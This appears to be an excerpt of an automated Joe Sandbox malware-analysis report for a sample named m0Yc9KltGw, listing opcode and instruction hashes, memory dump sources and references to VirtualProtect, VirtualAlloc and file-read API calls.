                                • Opcode ID: ec02e1e4feb3c80c6adfa727321f3eb195846c654eb09cb7909f54025a695d6c
                                • Instruction ID: 421c2a25837bd37ef9df8c1345bb63eb8b0e5862cd5f5f50bbcc71bd2557862c
                                • Opcode Fuzzy Hash: ec02e1e4feb3c80c6adfa727321f3eb195846c654eb09cb7909f54025a695d6c
                                • Instruction Fuzzy Hash: FB31B8B1D042699BEB208B64CC94BEABBF5AF85700F0542F9D84D67281C7355EC2CF95
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: a80a29e17d8f813c7b70764603bca8c33264147c749a89b63a7a28b7058a01bf
                                • Instruction ID: 97660a0306e1d6010161f1862e80d69e130d2565902a29eab282f60f5a37cb49
                                • Opcode Fuzzy Hash: a80a29e17d8f813c7b70764603bca8c33264147c749a89b63a7a28b7058a01bf
                                • Instruction Fuzzy Hash: 863180B1D442699FEB218B24CC90BEAB775EB85310F2085E5E90DA6640DB399FC58F21
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5d0fd1ae91ea226b14b0b5c44215ec42e19fedf3cd54d459f6eacee1592bd391
                                • Instruction ID: 5bbbc23cdc4ded25b02a0f5c4d2868dde1b425b9a1500e909335b7e871e4a6ee
                                • Opcode Fuzzy Hash: 5d0fd1ae91ea226b14b0b5c44215ec42e19fedf3cd54d459f6eacee1592bd391
                                • Instruction Fuzzy Hash: 573185B1D442699FEB25CB24CC80FEAB775EB85310F2081E9E90D56644DB389FC58F15
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 2d21c0b34c9788491b81b528c25ee2ce64cacf79862f98fb81aeef3d19952839
                                • Instruction ID: 7baad91ec9539075846e9e71117682ba3d529e0fa0e9ad7532972fca841d56c6
                                • Opcode Fuzzy Hash: 2d21c0b34c9788491b81b528c25ee2ce64cacf79862f98fb81aeef3d19952839
                                • Instruction Fuzzy Hash: 202107B2D042695BEB108B74CD94AEABFF5AF85700F0541F9D48D67281DA345EC18F85
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 3b0059f80076b27c0c70d3cc995375909e97c04dc89d395549a24924357da82b
                                • Instruction ID: 6994518bfd366080624fc583ad6bd404c4a6a0bef2d35b02ba2e337d90b03b02
                                • Opcode Fuzzy Hash: 3b0059f80076b27c0c70d3cc995375909e97c04dc89d395549a24924357da82b
                                • Instruction Fuzzy Hash: C721F7B2D042699BEB208B64CC94AEABBF6AF85700F0541F5D48D63180DA355EC28F95
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5d6d9fd0495b1833a69c2f846602121d8ae422c577135a5fa8b79c07e6a9623f
                                • Instruction ID: 05cca28db6b234cc533e1ee3550825bd21fa8312eed3d9731ad17eaccc4c4a31
                                • Opcode Fuzzy Hash: 5d6d9fd0495b1833a69c2f846602121d8ae422c577135a5fa8b79c07e6a9623f
                                • Instruction Fuzzy Hash: 052108B2D042699BEB20CB64CC94AEABFF6AFC5700F0581F5D48D63180DA355EC28F95
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: e604e82e8c333efc5e61c31fa6232922af0d462dba9eaa3c901ddbf306ee3e43
                                • Instruction ID: e7a9fb9abfd5657dca2c06e77fbb672b3ff5945eb1fbd0d1e0fa911dc1f20ebd
                                • Opcode Fuzzy Hash: e604e82e8c333efc5e61c31fa6232922af0d462dba9eaa3c901ddbf306ee3e43
                                • Instruction Fuzzy Hash: 6E21F9B2D042695BEB108B64CC94AEABBF6AFC5700F0541F9D48D63180DA355EC18F95
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 60b1fca8b6581e84d73fed5606978d4526972337b1b519dfa549f04aa852fb8b
                                • Instruction ID: d68b0b64a1198a9be949a69f9e7e0b4342f7cd94a63d5bf33eeb9390d66992df
                                • Opcode Fuzzy Hash: 60b1fca8b6581e84d73fed5606978d4526972337b1b519dfa549f04aa852fb8b
                                • Instruction Fuzzy Hash: D92183B2D05259AFEB21CA24CC40FEEB735EB84300F20C1E5E90D96644DB389EC58F15
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: a3de049d54785bd6be312539eee85e734a079ea5e3e89847f026922676f771a5
                                • Instruction ID: e09e274c13f18c5b66e1f1166a249385b6eeb30cd504290efd2124e05ff6e085
                                • Opcode Fuzzy Hash: a3de049d54785bd6be312539eee85e734a079ea5e3e89847f026922676f771a5
                                • Instruction Fuzzy Hash: D22193B2A04259ABEB21CA24CC44FFEB775EBC4300F24C1E5E90D96A44D779AEC58F15
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b8bb818cb25102c446a40a34b7d405ebbb6f7adad3b2c498efde0bfb19d21046
                                • Instruction ID: f7ce969fc1da27a852ef5f6a24c7df84919748704ccbd3cc72841e40331ee1bf
                                • Opcode Fuzzy Hash: b8bb818cb25102c446a40a34b7d405ebbb6f7adad3b2c498efde0bfb19d21046
                                • Instruction Fuzzy Hash: 7A2184B1D44269AFEB20CA24CC80FEEB775EB84300F20C5E5E90DA6644D7389EC58F25
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 99e5c2f204b4e2e2ca4b7b839bbf908759d64a5760e4c36f304bd68dd63153fd
                                • Instruction ID: c13e552566eb71352ea5c9f0297007b755f6de2fca1c905aece1fe5f8f9b4243
                                • Opcode Fuzzy Hash: 99e5c2f204b4e2e2ca4b7b839bbf908759d64a5760e4c36f304bd68dd63153fd
                                • Instruction Fuzzy Hash: 032162B1D44269ABEB20CA24CC80FEEB775EB84300F20C1E5E90D66644D7389EC58F15
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1b7654e9ba8801b3273b4d415fa62292fd0be11e22c88c1545836acc0748d3ca
                                • Instruction ID: 8d50b40175cd5d55bbf2bdc2c1f1af36d77f3cee4be9c570d54b6cce8544da35
                                • Opcode Fuzzy Hash: 1b7654e9ba8801b3273b4d415fa62292fd0be11e22c88c1545836acc0748d3ca
                                • Instruction Fuzzy Hash: 8C2184B1D44269AFEB20CA24CC80FEEB775EB84300F20C1E5E90D66644DB389EC58F15
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: fdf94020f97f6d62972922ffa48bcac57a446b4d85dbfcfa11612f614eb66614
                                • Instruction ID: 5df7359fe7e98f5f655b82226194c25b7a0112d7e5c5df594decb01885cba1aa
                                • Opcode Fuzzy Hash: fdf94020f97f6d62972922ffa48bcac57a446b4d85dbfcfa11612f614eb66614
                                • Instruction Fuzzy Hash: 9B11BFB1C05276AFD724DB54CC40ADABBB8AF01300F0185FAE84CAB181D6399A84CF91
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2729788978.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                • Associated: 00000000.00000002.2729788978.00000000038CA000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000000.00000002.2729788978.00000000038CE000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000000.00000002.2729788978.00000000038EA000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000000.00000002.2729788978.00000000038F3000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_31a0000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction ID: 933be8071f0d6d3a30d3a4238a8b18ece7488d0241ab979ff6528888495a31a8
                                • Opcode Fuzzy Hash: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction Fuzzy Hash: 82E09275505B40CFCB15DF28C2C5606BBF0EB88A00F0485A8DE098F70AE774EE10DAD2
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 1636317e09ed9bf6e723c1ba0692f9dea90b71a868ce5630038a96af926d361b
                                • Instruction ID: 0f576ecb9445df7f96b6c1c6580efdc3b234a1bac4366be6c2bb6c7911e1ff18
                                • Opcode Fuzzy Hash: 1636317e09ed9bf6e723c1ba0692f9dea90b71a868ce5630038a96af926d361b
                                • Instruction Fuzzy Hash: 07B179B0E005688FDB24CB18CD98BFAB7B9EF85305F1485EAD849A7240D7756EC1CE81
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b10c66b9bc5f3e90f82088c972bcfc3a901e9b666b2aec7145243faed51f36a5
                                • Instruction ID: e456b076085f1f6fbe6d166bc3bce68bf6723dadd5d40b8e52f693024f9409ec
                                • Opcode Fuzzy Hash: b10c66b9bc5f3e90f82088c972bcfc3a901e9b666b2aec7145243faed51f36a5
                                • Instruction Fuzzy Hash: A261E3A1E542689BFB24CA14DC80BBE7779FF84310F1081FAD50DA7684D6795EC58F22
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0296B21B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0